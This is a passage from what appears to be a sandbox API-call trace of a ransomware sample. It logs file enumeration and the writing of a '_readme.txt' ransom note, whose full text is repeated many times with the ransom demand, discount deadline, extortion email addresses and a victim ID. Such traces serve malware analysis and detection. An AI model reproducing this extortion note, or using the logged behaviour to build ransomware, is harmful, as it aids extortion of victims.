Flags=0x0, Size=0x1c) returned 0x3a59ec0 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59fb0 [0173.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a078 | out: hHeap=0x2c0000) returned 1 [0173.583] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a078 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x35773c0 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59b28 [0173.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59fb0 | out: hHeap=0x2c0000) returned 1 [0173.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ec0 | out: hHeap=0x2c0000) returned 1 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59ec0 [0173.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a078 | out: hHeap=0x2c0000) returned 1 [0173.583] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a078 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x3aa8c20 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59fb0 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59e20 [0173.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59b28 | out: hHeap=0x2c0000) returned 1 [0173.584] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.584] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a078 [0173.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.584] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0173.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.584] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.584] PathFindFileNameW (pszPath="") returned="" [0173.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a078 [0173.584] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.585] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.585] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8d2f0 [0173.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59920 [0173.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c68 [0173.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a078 | out: hHeap=0x2c0000) returned 1 [0173.585] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59920 | out: hHeap=0x2c0000) returned 1 [0173.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c68 | out: hHeap=0x2c0000) returned 1 [0173.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c68 [0173.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3a8d2f0 [0173.585] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0173.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c68 | out: hHeap=0x2c0000) returned 1 [0173.585] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0173.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.585] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.586] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.586] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.586] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.586] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.587] CloseHandle (hObject=0x690) returned 1 [0173.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c68 [0173.588] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x1e41ab20, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e41ab20, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c68 | out: hHeap=0x2c0000) returned 1 [0173.588] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x1e41ab20, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e41ab20, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.588] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e41ab20, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e41ab20, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e41ab20, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.588] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e41ab20, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e41ab20, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e41ab20, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.588] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0173.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9dcd0 [0173.588] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e0c0 | out: hHeap=0x2c0000) returned 1 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e0c0 | out: hHeap=0x2c0000) returned 1 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e0c0 | out: hHeap=0x2c0000) returned 1 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e0c0 | out: hHeap=0x2c0000) returned 1 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e0c0 | out: hHeap=0x2c0000) returned 1 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e0c0 | out: hHeap=0x2c0000) returned 1 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9dcd0 | out: hHeap=0x2c0000) returned 1 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.589] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: 